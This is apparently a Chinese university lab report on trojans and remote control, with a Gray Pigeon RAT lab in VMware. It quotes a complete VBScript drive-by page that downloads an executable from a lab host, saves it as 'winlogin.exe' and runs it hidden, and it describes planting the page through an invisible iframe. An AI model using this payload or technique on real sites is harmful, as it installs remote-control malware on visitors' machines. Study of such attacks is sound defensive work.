2017-2018-1 20155312 20155325 实验四 木马及远程控制技术

一、 实验环境

VMware Workstation

二、 实验内容

木马生成与植入

利用木马实现远程控制

木马的删除

三、 实验过程

（一） 木马生成与植入

1． 生成网页木马

主机A通过Internet信息服务(IIS)管理器启动“木马网站”的步骤如下：

开始->程序->管理工具->Internet信息服务（IIS）管理器

在“木马网站”上右键->启动

「问题1」：为什么启动木马网站？

「答」：为了保证我们可以发布修改过的木马网页，使得被攻击方访问默认网页时，木马网站处于工作状态。

「问题2」：在服务器配置时，有多少同学将配置里的不同属性页进行了查看？除了“自动上线设置”属性页，还有哪些属性页？

「答」：配置服务器时的界面如图1所示，可见配置里包含“自动上线设置、安装选项、启动项设置、代理服务、高级选项、插件功能”这6个属性页，其中启动项设置如图2所示，这里指定了显示名称和服务名称为“Windows XP Vista”，所以在后续操作中，被挂马的主机B在查看监控器工具时，会发现名为“Windows XP Vista”的服务名称和显示名称。





「问题3」：为什么在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”？换为另一个路径可以吗？

「答」：因为D:\Work\IIS\为“木马网站”的网站空间目录，不可以更改，这和我们第一步启动木马网站是息息相关的。

「问题4」：对网页木马源码进行阅读分析。

「答」：网页木马的源码Trojan.htm如下：

<html>
<script language="VBScript">
<!-- 首先动态创建对象组件，并声明组件的clsid -->
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

<!-- 创建XMLHTTP对象，用来完成从数据包到Request对象的转换以及发送任务 -->
Set xh = df.createObject("Microsoft.XMLHTTP","")

<!-- 创建Adodb.Stream对象，提供存取二进制数据或文本流，实现对流的读、写等操作 -->
Set ados = df.createObject("Adodb.Stream","")
ados.type = 1

<!-- 使用HTTP GET初始化HTTP请求 -->
url = "http://172.16.0.98:9090/Server_Setup.exe"
xh.Open "GET", url, False
<!-- 发送HTTP请求，并获取HTTP响应 -->
xh.Send

<!-- 创建Scripting.FileSystem对象，提供对计算机文件系统进行访问 -->
Set fs = df.createObject("Scripting.FileSystemObject","")
<!-- 获取目标路径，0为windows目录；1为system目录；2为用户临时目录 -->
Set tmpdir = fs.GetSpecialFolder(2)
<!-- 向目标路径后添加文件名称winlogin.exe，此名称与系统文件名相似，不易被察觉 -->
fname1="winlogin.exe"
fname1= fs.BuildPath(tmpdir,fname1)

<!-- 打开Adodb.Stream对象，将服务器返回的响应数据写入对象，将对象内容保存至目标文件-->
ados.Open
ados.Write xh.responseBody
ados.SaveToFile fname1,2
<!-- 文件系统操作完成，关闭对象 -->
ados.Close

<!-- 创建Shell对象，调用执行目标文件 -->
Set sl = df.createObject("Shell.Application","")
<!-- 以隐藏方式运行木马 -->
sl.ShellExecute fname1,"","","open",0
</script>
</html>

其中

Set tmpdir = fs.GetSpecialFolder(2)

指定了目标目录为用户临时目录，

fname1="winlogin.exe"     fname1= fs.BuildPath(tmpdir,fname1)

这两句指明会在用户的临时目录后添加winlogin.exe文件。

「问题4」：为什么要将Trojan.htm文件保存到“D:\Work\IIS”目录下？

「答」：因为D:\Work\IIS\为“木马网站”的网站空间目录，这有保存在这个目录下，才能使得被攻击端运行木马网站时能够执行

Trojan.htm文件中的指令。

2． 完成对默认网站的“挂马”过程

「问题1」：iframe标签有什么作用？

「答」：iframe也叫浮动帧标签，在一个正常网站的主页上链接网页木马，它把一个Trojan.htm嵌入index.html页里实现“画中画”的效果。在本实验中，它为了插入木马,把框架设置为不可见,主机B访问index.html时，其实同时打开了不可见的木马网页Trojan.htm

「问题2」：为什么使用9090端口？

「答」：9090端口是一个TCP端口，这个端口不是系统默认的端口，属于自定义的端口。Windows本身没有用到9090端口。

Webshpere的管理工具端口默认是9090；

3． 木马的植入

木马植入后木马客户端在灰鸽子远程控制->文件目录浏览->自动上线主机中可以发现木马服务端主机B，如图3所示：



「问题1」：观察木马服务器端安装程序的运行结果与配置服务器时的设置是否一致。

「答」：一致，如服务器配置时的设置，木马服务器端安装程序后，如下图所示：





「问题2」：Hacker.com.cn.ini在前面的过程中哪里设置的？

「答」：木马客户端在灰鸽子远程控制->配置服务器->安装选项->安装路径 中设置了Hacker.com.cn.ini，如下图所示：



「问题3」：Hacker.com.cn.ini文件是由哪个进程创建的：

「答」：进程ID ** 1172 ** ；



「问题4」：Windows XP Vista服务在前面的过程中哪里设置的？

「答」：木马客户端配置服务器->启动项设置时指定，如下图所示：



「问题5」：Windows XP vista服务的执行体文件是： Hacker.com.cn.ini

「问题6」：端口8000在前面的过程中哪里设置的？

「问题7」：8000服务远程地址（控制端）地址： 172.16.0.98



「问题8」：经过对上述监控信息的观察，你认为在“进程监控”中出现的winlogoin.exe进程（若存在）在整个的木马植入过程中起到的作用是：

++ 用于定时监测控制端是否存在，发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。 ++

「问题9」：winlogoin.exe在前面的过程中哪里设置的？

「答」：木马网页的脚本Trojan.htm文件中设置的。如下图所示：

（二） 木马的功能

1． 文件管理

木马客户端修改文件名如下图所示：



在主机B上观察文件操作的结果。

2． 系统信息查看

3． 进程查看

木马客户端查看木马服务端进程如下图所示：



木马服务端本机查看进程如下图所示：

4． 注册表管理

木马客户端添加了“zjy”注册表项，如下图所示：



木马服务端没有变化，如下图所示：

5. Telnet

6．其它命令及控制

木马客户端对木马服务端进行“捕获屏幕”，如下图所示：

（三） 木马的删除

木马服务端自动删除成功，如下图所示：



木马客户端手动删除如下图所示：

四、 实验总结

问题：在主机B访问 http://主机A IP时，“灰鸽子远程控制”的“文件目录浏览”树中未出现主机B的信息

解决：当时把IP地址输错了，又等待了一小会儿后运行正常。

五、 思考题

1． 列举出几种不同的木马植入方法。

直接攻击；电子邮件；文件下载；浏览网页；合并文件

2． 列举出几种不同的木马防范方法。

不到不受信任的网站上下载软件运行

不随便点击来历不明邮件所带的附件

及时安装相应的系统补丁程序

为系统选用合适的正版杀毒软件，并及时升级相关的病毒库

为系统所有的用户设置合理的用户口令